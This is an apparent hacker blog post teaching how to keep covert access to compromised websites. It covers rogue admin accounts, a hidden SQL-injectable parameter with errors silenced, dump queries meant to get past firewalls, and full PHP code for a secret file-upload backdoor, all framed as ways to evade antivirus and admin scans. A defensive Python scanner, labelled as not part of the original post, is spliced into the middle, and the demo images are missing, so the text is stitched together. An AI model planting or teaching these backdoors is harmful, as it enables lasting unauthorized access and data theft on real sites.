Leaving SQL Backdoors in Web Applications

In the Name of ALLAH the most Beneficent and the Merciful
I was thinking that our backdoors got removed :( how and why, then I talked to web admins and server admins, and they stated that “We run anti-virus on a weekly basis and some scripts (written in different languages like Perl etc.) which are signature based; they find the bad code (backdoors) for us and remove these”.
So I thought to find a good way of leaving backdoors (other than fudding your shell — I have been using that and that is also a successful technique though :D)
Well, today I want to discuss purely the SQL-related backdoors.
Method 1:
The most common method is to add another admin user. There is a 0.5% chance that the user is removed by the admin, because no site admin looks for that and most penetration testers don’t pay attention to it.
Method 2:
Add a query that is vulnerable to SQL injection in any page, and give your parameter a weird name, e.g. Crapish (just kidding, you can name it anything). Don't forget to put error_reporting(0) after the opening PHP tag; otherwise, when the parameter is missing, it will cause an error on the page.
Demo:
E.g. we are editing the products page. We just need to put these lines anywhere inside the page.
[Image: SQL Backdoor 2]

Now the antivirus will never flag it as a backdoor, and neither will the scripts. As you can see, this script is injectable, so you can inject the page at any time, while the parameter is also hidden from other people, and you can name the parameter whatever you want. You can also patch the site's other parameters to maintain your access.
and you can inject it like
Method 3:
This is my optimized method, because some sites are secured with some shitty firewalls. When you have injected it, or after you have backdoored it, just make some if/else statements and put some awesome queries there which can get you all the info you need, like this :D
This is just the idea; you can do it any way you want to :D
Demo:
[Image: SQL Backdoor 2]

to get only tables
to get the columns also
to dump the data
Method 4:
You can inject your upload script into any file, with a parameter like hacked or something else.

Here is the code:
<?php if($_GET['id']=='your parameter')
{
echo 'hacker<br>';
echo '<br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }
 else { echo '<b>Upload !!!</b><br><br>'; }
}
}
?>
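A defender's view of the methods above, as an added example that is not part of the original post: a Python review script that flags the code patterns Methods 2 to 4 rely on (silenced errors, request data passed straight into a SQL call, an upload saved under its client-supplied name) and, for Method 1, admin accounts missing from an approved baseline. The rule names, function names, account names and the sample page are assumptions constructed for illustration.

```python
import re

# Review triggers for the edits the post describes. They are heuristics for a
# human reviewer, not signatures of one specific backdoor.
RULES = [
    ("error-reporting-disabled",
     re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("request-data-in-sql-call",
     re.compile(r"\b(?:mysql_query|mysqli_query|query|exec)\s*\([^;]*"
                r"\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("upload-saved-under-client-name",
     re.compile(r"\b(?:copy|move_uploaded_file)\s*\([^;]*"
                r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]tmp_name['\"]\s*\][^;]*"
                r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]")),
]

def scan_php(source):
    """Return sorted (line_number, rule_name) pairs for every rule hit."""
    hits = []
    for name, pattern in RULES:
        for m in pattern.finditer(source):
            hits.append((source.count("\n", 0, m.start()) + 1, name))
    return sorted(hits)

def unexpected_admins(current, baseline):
    """Method 1 check: admin accounts that are not in the approved baseline."""
    return sorted(set(current) - set(baseline))

# Constructed sample page (not from the post): line 5 is a safe control.
SAMPLE = """<?php
error_reporting(0);
$r = mysql_query("SELECT name FROM products WHERE id=" . $_GET['zz']);
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'ok'; }
$stmt = $db->prepare("SELECT name FROM products WHERE id = ?");
?>"""

if __name__ == "__main__":
    for line, rule in scan_php(SAMPLE):
        print(f"line {line}: {rule}")
    # Constructed account lists; in practice these come from the users table.
    print(unexpected_admins(["admin", "editor", "support2"], ["admin", "editor"]))
```

Hits are prompts for manual review rather than proof of compromise; comparing deployed files against the release copy catches edits that match none of these patterns.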
That's all for today. Thanks for reading this. :D
Love For
| Lafangoo | Connecting | Ch3rn0by1 | exploiter-z | madcodE | PMH`s Str!k3r | Mauratania Attacker | Hussein Haxor | MakMan | BlackHawk | Zen | Rahul | Gujjar (PCP) | rootxx |
Hi, this is Osama Mahmood and I will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. Follow me on Twitter @OsamaMahmood007